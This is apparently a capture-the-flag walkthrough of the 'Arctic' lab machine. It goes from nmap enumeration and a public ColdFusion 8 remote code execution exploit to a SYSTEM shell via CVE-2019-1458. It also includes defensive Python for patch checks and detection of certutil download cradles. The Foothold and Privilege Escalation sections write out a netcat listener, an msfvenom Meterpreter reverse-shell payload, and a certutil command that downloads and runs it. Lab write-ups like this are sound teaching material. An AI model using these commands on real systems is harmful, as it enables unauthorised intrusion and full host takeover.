Overview

Arctic is an easy Windows machine that demonstrates how an exposed legacy Adobe ColdFusion service can lead to remote code execution, followed by local privilege escalation through an unpatched Windows kernel vulnerability.

Attack Chain

  • Enumerate exposed TCP services with nmap
  • Identify Adobe ColdFusion running on port 8500
  • Browse the exposed CFIDE and cfdocs directories
  • Confirm the ColdFusion 8 Administrator interface
  • Use a public ColdFusion 8 remote command execution exploit
  • Modify the exploit parameters and catch a shell as tolis
  • Generate and transfer a Meterpreter payload
  • Run Metasploit local_exploit_suggester
  • Exploit cve_2019_1458_wizardopium
  • Gain a shell as NT AUTHORITY\SYSTEM

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.13.248; export NAME=ARTIC; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(grep '^[0-9]' scans/nmap_allports_$NAME.nmap | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

135,8500,49154

[Screenshot: nmap results]

Findings

The scan shows a small attack surface. RPC (135) and a high RPC port are exposed, but the main point of interest is port 8500, which is hosting a web service. Since this is not a standard HTTP port, it is worth browsing manually to understand what application is running.


Web Enumeration

Directory Listing on Port 8500

Browsing to port 8500 reveals an open directory listing.

[Screenshot: web directory listing]

The /CFIDE path also exposes a directory listing.

[Screenshot: CFIDE directory listing]

The cfdocs directory appears to contain documentation and sample material for ColdFusion.

[Screenshot: cfdocs listing]

ColdFusion Administrator

The /CFIDE/Administrator endpoint leads to an Adobe ColdFusion 8 Administrator login page. The admin username is already filled in and greyed out, which confirms that this is the administrative interface for the ColdFusion instance.

[Screenshot: ColdFusion Administrator login]

At this point, the exposed version is the key finding. Adobe ColdFusion 8 has known public exploits, so the next step is to look for a matching remote code execution path.


Foothold

ColdFusion 8 Remote Code Execution

A public remote command execution exploit is available for ColdFusion 8.

https://www.exploit-db.com/exploits/50057

After downloading the exploit, some parameters need to be modified so that it points to the target and calls back to the attacking machine.

[Screenshot: modified ColdFusion exploit]

Before running the exploit, we start a Netcat listener on port 443 using rlwrap for a better shell experience.

rlwrap -cAr nc -lvnp 443

The exploit is then executed.

[Screenshot: exploit execution]

The exploit continues running and triggers the callback.

[Screenshot: exploit callback]

A shell is caught as the user tolis.

[Screenshot: shell as tolis]

The user flag can now be read.

type C:\Users\tolis\Desktop\user.txt

[Screenshot: user flag]


Privilege Escalation

System Enumeration

After gaining a shell as tolis, we check the operating system details with systeminfo.

systeminfo

The target is running Windows Server 2008.

[Screenshot: systeminfo Windows version]

The build is 7600, and there are no installed hotfixes. This strongly suggests that the system is missing several important security patches.

[Screenshot: systeminfo hotfixes]
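The patch-state reasoning above (pre-SP1 build, no hotfixes, end-of-support OS) can be turned into an automated check over saved systeminfo output. This is an added example, not part of the original writeup; the two systeminfo excerpts below are constructed, and the KB numbers in the patched sample are placeholders.

```python
import re

# Constructed systeminfo excerpts (not the box's real output), trimmed to the
# lines the check needs. The KB numbers are placeholder sample values.
SAMPLE_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""
PATCHED_SAMPLE = """\
Host Name:                 LAB-SRV
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4512578
                           [02]: KB4514366
                           [03]: KB4516077
"""


def parse_systeminfo(text):
    """Parse 'Key: value' lines plus the indented '[nn]: KB...' hotfix list."""
    info, hotfixes = {}, []
    for line in text.splitlines():
        m = re.match(r"^\s+\[\d+\]:\s*(KB\d+)", line)
        if m:
            hotfixes.append(m.group(1))
            continue
        m = re.match(r"^([^:]+):\s*(.*)$", line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
    info["hotfix_list"] = hotfixes
    return info


def assess(text):
    """Return the list of patch-state findings for one systeminfo dump."""
    info = parse_systeminfo(text)
    findings = []
    version = info.get("OS Version", "")
    build = re.search(r"Build (\d+)", version)
    build = int(build.group(1)) if build else None
    # Server 2008 / 2008 R2 left extended support in January 2020
    if "2008" in info.get("OS Name", ""):
        findings.append("end_of_support_os")
    # 6.1.7600 is the RTM build of 2008 R2; SP1 moved it to 7601
    if version.startswith("6.1.") and build is not None and build < 7601:
        findings.append("pre_sp1_build")
    if not info["hotfix_list"] or info.get("Hotfix(s)", "").startswith("N/A"):
        findings.append("no_hotfixes")
    return findings
```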

Because this is an older unpatched Windows host, kernel exploits are a likely privilege escalation path. To make exploit selection easier, we use Metasploit’s local_exploit_suggester, but first we need to establish a Meterpreter session.

Meterpreter Payload

On the attacking machine, we generate a Windows Meterpreter payload with msfvenom.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.17 LPORT=4545 -f exe -o met4545.exe

[Screenshot: msfvenom payload]

The payload is then downloaded to the target using certutil.

certutil.exe -urlcache -f http://10.10.14.17/met4545.exe .\met4545.exe

[Screenshot: certutil payload download]

Back in Metasploit, we configure a multi/handler for the Meterpreter payload. Once the handler is running, the payload is executed on the target.

cmd /c c:\users\public\met4545.exe

[Screenshot: Meterpreter payload execution]

A Meterpreter session is received as tolis.

[Screenshot: Meterpreter session as tolis]
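From the defender's side, both steps just shown (certutil fetching a remote executable, then an executable launched out of C:\Users\Public) are visible in process-creation telemetry. The following detection rules are an added example, not part of the original writeup; the event records are constructed to mirror the commands above, and the rule set goes slightly beyond the page by also catching certutil's -verifyctl and -decode variants.

```python
import re
import shlex

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style,
# reduced to the two fields the rules need). Not real logs from the Arctic box.
SAMPLE_EVENTS = [
    {"user": "ARCTIC\\tolis",
     "cmdline": "certutil.exe -urlcache -f http://10.10.14.17/met4545.exe .\\met4545.exe"},
    {"user": "ARCTIC\\tolis", "cmdline": "cmd /c c:\\users\\public\\met4545.exe"},
    {"user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "certutil.exe -hashfile C:\\Windows\\System32\\drivers\\etc\\hosts SHA256"},
    {"user": "ARCTIC\\tolis",
     "cmdline": "C:\\Tools\\7z.exe a backup.zip C:\\Users\\Public\\docs"},
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# An executable path inside a directory that any local user can write to
WRITABLE_EXE_RE = re.compile(
    r"[\\/](?:users[\\/]public|windows[\\/]temp|programdata)[\\/].*\.(?:exe|dll|bat|ps1|vbs)$",
    re.IGNORECASE)
CRADLE_FLAGS = {"-urlcache", "-verifyctl", "/urlcache", "/verifyctl"}
DECODE_FLAGS = {"-decode", "-decodehex", "/decode", "/decodehex"}


def analyze_event(event):
    """Return the list of rule names triggered by one process-creation event."""
    findings = []
    tokens = [t.strip('"') for t in shlex.split(event["cmdline"], posix=False)]
    if not tokens:
        return findings
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    flags = {t.lower() for t in tokens[1:] if t[:1] in ("-", "/")}
    has_url = any(URL_RE.match(t) for t in tokens[1:])
    if image in ("certutil", "certutil.exe"):
        # Rule 1: certutil fetching a remote URL (the download cradle used above)
        if has_url and flags & CRADLE_FLAGS:
            findings.append("certutil_download_cradle")
        # Rule 2: certutil used to decode a staged base64/hex payload
        if flags & DECODE_FLAGS:
            findings.append("certutil_decode")
    # Rule 3: anything executed out of a world-writable staging directory
    if any(WRITABLE_EXE_RE.search(t) for t in tokens):
        findings.append("exec_from_writable_dir")
    return findings


def scan(events):
    """Run every rule over a batch of events; returns (user, cmdline, rule) hits."""
    return [(e["user"], e["cmdline"], f) for e in events for f in analyze_event(e)]
```

The hashfile and 7-Zip records are included as benign controls; neither trips a rule, while the two commands from the writeup each produce one hit.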

Exploit Suggester

With the Meterpreter session established, we background it and run Metasploit’s local exploit suggester.

search exploit_suggester
use 0
set session 1
run

The module identifies several possible local privilege escalation options. In this case, exploit/windows/local/cve_2019_1458_wizardopium is selected because it has worked reliably against Windows build 7600 in similar environments.

[Screenshot: exploit suggester results]

The exploit is configured with the existing Meterpreter session and a new callback port.

use exploit/windows/local/cve_2019_1458_wizardopium
set session 1
set lhost 10.10.14.17
set lport 4646
run

[Screenshot: wizardopium exploit run]

The exploit runs without errors.

[Screenshot: wizardopium exploit success]

A new shell is obtained as NT AUTHORITY\SYSTEM.

[Screenshot: SYSTEM shell]

The root flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

[Screenshot: root flag]


Key Takeaways

Arctic shows how dangerous exposed legacy software can be when it is left unpatched. Adobe ColdFusion 8 provided a direct remote code execution path, and the underlying Windows Server 2008 host had no hotfixes installed, making local privilege escalation straightforward. The compromise path is simple, but it reinforces the importance of patching both internet-facing applications and the operating system underneath them.